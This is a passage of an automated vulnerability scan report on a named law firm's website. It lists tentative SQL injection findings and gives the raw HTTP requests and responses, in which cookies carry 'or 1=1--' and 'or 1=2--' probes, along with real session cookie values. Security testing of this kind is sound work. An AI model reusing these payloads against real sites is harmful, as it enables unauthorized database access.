Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A2718225561'%20or%201%3d2--%20; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.56. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotutk cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotutk cookie appears to be vulnerable to SQL injection attacks. The payloads 74472467'%20or%201%3d1--%20 and 74472467'%20or%201%3d2--%20 were each submitted in the hubspotutk cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee574472467'%20or%201%3d1--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTUTK=;expires=Wed, 12-May-2010 17:52:20 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee574472467'%20or%201%3d2--%20; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.57. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvd cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotvd cookie appears to be vulnerable to SQL injection attacks. The payloads 19197715'%20or%201%3d1--%20 and 19197715'%20or%201%3d2--%20 were each submitted in the hubspotvd cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee519197715'%20or%201%3d1--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVD=;expires=Wed, 12-May-2010 17:52:26 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee519197715'%20or%201%3d2--%20; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.58. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvm cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotvm cookie appears to be vulnerable to SQL injection attacks. The payloads 35384051'%20or%201%3d1--%20 and 35384051'%20or%201%3d2--%20 were each submitted in the hubspotvm cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee535384051'%20or%201%3d1--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVM=;expires=Wed, 12-May-2010 17:52:38 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee535384051'%20or%201%3d2--%20; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.59. http://www.pillsburylaw.com/connect_forgotpassword.cfm [hubspotvw cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The hubspotvw cookie appears to be vulnerable to SQL injection attacks. The payloads 15063829'%20or%201%3d1--%20 and 15063829'%20or%201%3d2--%20 were each submitted in the hubspotvw cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515063829'%20or%201%3d1--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: HUBSPOTVW=;expires=Wed, 12-May-2010 17:52:32 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee515063829'%20or%201%3d2--%20; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.60. http://www.pillsburylaw.com/index.cfm [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 22027432%20or%201%3d1--%20 and 22027432%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A09%3A01; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953722027432%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046; __utmb=249287046.1.10.1305218658

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 16:45:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Wed, 12-May-2010 16:45:59 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
